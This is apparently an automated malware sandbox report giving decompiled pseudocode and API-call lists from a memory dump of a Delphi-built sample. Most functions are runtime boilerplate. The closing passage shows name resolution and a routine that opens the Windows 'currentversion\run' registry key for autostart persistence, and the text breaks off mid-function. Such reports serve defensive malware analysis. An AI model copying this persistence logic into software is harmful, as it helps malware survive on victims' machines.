      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}






























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}






    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}












    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}






    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}


































    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}
































    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}
































    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}













    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}











    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}
























    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}
















    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
